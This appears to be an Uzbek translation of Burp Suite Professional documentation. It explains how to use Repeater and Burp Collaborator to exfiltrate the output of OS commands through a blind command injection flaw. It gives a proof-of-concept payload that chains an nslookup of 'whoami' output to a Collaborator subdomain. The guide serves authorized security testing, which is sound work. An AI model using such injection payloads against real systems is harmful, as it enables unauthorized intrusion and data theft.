Professional
Burp Suite bilan ma'lumotni sizdirish uchun OS command injection zaifliklaridan foydalanish
Oxirgi yangilanish: 23-iyul, 2026O'qish vaqti: 1 daqiqa
Asinxron OS command injection'ga qarshi zaif bo'lgan so'rovni aniqlaganingizdan so'ng, veb-sayt va Burp Collaborator o'rtasidagi tashqi kanal (out-of-band) orqali kiritilgan buyruqlar natijasini chiqarib olishga urinishingiz mumkin.
Boshlashdan oldin
Asinxron OS command injection'ga qarshi zaif bo'lgan so'rovni aniqlang. Batafsil ma'lumot uchun qarang: Burp Suite bilan asinxron OS command injection zaifliklarini sinash.
Qadamlar
So'rovdan ma'lumot chiqarib olishga urinish uchun Burp Repeater'dan foydalanishingiz mumkin:
- Proxy > HTTP history da asinxron OS command injection'ga qarshi zaif bo'lgan so'rovga o'ng tugma bilan bosing. Send to Repeater ni tanlang.
- Repeater yorlig'iga o'ting.
- Parametr qiymatini proof-of-concept payload'iga o'zgartiring. Payload quyidagilarni o'z ichiga olishi kerak: Masalan,
& nslookupwhoami.burp-collaborator-subdomain &Burp Collaborator subdomeniga DNS so'rovini keltirib chiqarishi mumkin. Bu so'rovwhoamibuyrug'ining natijasini o'z ichiga oladi.- Collaborator subdomeni uchun DNS so'rovini keltirib chiqarish uchun
nslookupbuyrug'i. Payload ichiga Collaborator subdomenini joylashtirish uchun o'ng tugmani bosing va Insert Collaborator payload ni tanlang. - Ma'lumot oladigan buyruq, masalan,
whoamibuyrug'i.
- Collaborator subdomeni uchun DNS so'rovini keltirib chiqarish uchun
- Send tugmasini bosing.
- Collaborator yorlig'iga o'ting va Poll now tugmasini bosing. Collaborator serveri bilan har qanday muloqotlar jadvalda ro'yxatga olinadi.
- Chiqarib olingan ma'lumotlarni aniqlash uchun har qanday muloqot tafsilotlarini ko'rib chiqing.
Eslatma
Buyruq kechikish bilan bajarilishi mumkin. Muloqot sodir bo'lganda Collaborator yorlig'i miltillaydi. Kechikkan muloqotlarni aniqlash uchun Collaborator yorlig'ini tekshirishda davom etganingizga ishonch hosil qiling.